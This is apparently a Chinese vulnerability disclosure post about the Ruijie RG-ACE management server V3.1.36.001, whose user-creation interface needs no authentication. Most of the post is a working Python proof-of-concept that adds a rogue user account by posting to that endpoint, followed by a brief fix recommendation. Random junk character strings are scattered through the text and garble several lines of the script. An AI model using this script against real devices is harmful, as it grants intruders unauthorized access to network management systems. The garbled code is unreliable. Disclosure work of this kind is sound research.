锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


- k2 y! I4 l9 o% x. |测试的具体版本是
产品名称: 锐捷应用控制引擎
/ _% F0 z3 }$ A$ y8 n- ^+ x2 n版本号: 3.1.36.001 TC
. M/ Q8 l+ D! y' O7 K6 m  Q) d+ b编译时间: 201104291730
( S6 d8 i& b6 {" u4 V$ V
/ z" q& ^4 h# ^: j4 O# r
漏洞证明：

# i4 K* d3 }% n8 Z
& v( l6 m, `: V4 J
% E/ q5 j5 A, [. I9 U
4 [& P+ H0 C* u
8 U0 m8 L! j0 b* W
& E& ~6 v( S# A" l3 Q% U执行脚本
#! /usr/bin/env python
" E% Z; o4 H) ?. o#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
; i; u: S9 g3 q  X) hurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
! B3 j, F2 x9 S5 M: gopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
4 _, F8 u9 @+ y& Z; Q& M. X' I1 m8 Bpost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
& u  Z9 c7 }9 ]9 M* N("useropermanager","userManager"),
("userName","t"), #######账号自己加
% G& t& j! J+ O1 b8 Z0 N% u("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
: G. G5 ]& ^) `+ }("email",""),
) X2 r5 e5 v6 D7 _+ p("mobilePhone",""),
% i$ _' X* G- Z* Y2 Z("officePhone",""),
("addr",""),
/ i; W: p+ a* c: t; e("submit","确定"))
% }4 \2 l1 u- b# hurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
6 K; B, W$ w7 u" b+ `' u1 Uprint "Done"
3 A8 H. `" w, {' X" z
登录，连接设备
. M% \% T& t, K; a# U) F% ]


( P5 V( X' \9 y* q, G( F6 }

: y9 {! w% M) \. X+ u- s默认的管理员admin权限更大点

7 J5 B: I1 q1 o, ~& S. c



' [. i! |5 g3 t; ^% I8 q, I修复方案：
5 K( ]- D. e/ o# Q8 N/ a加强对接口的权限验证
6 Z; R! z1 `. [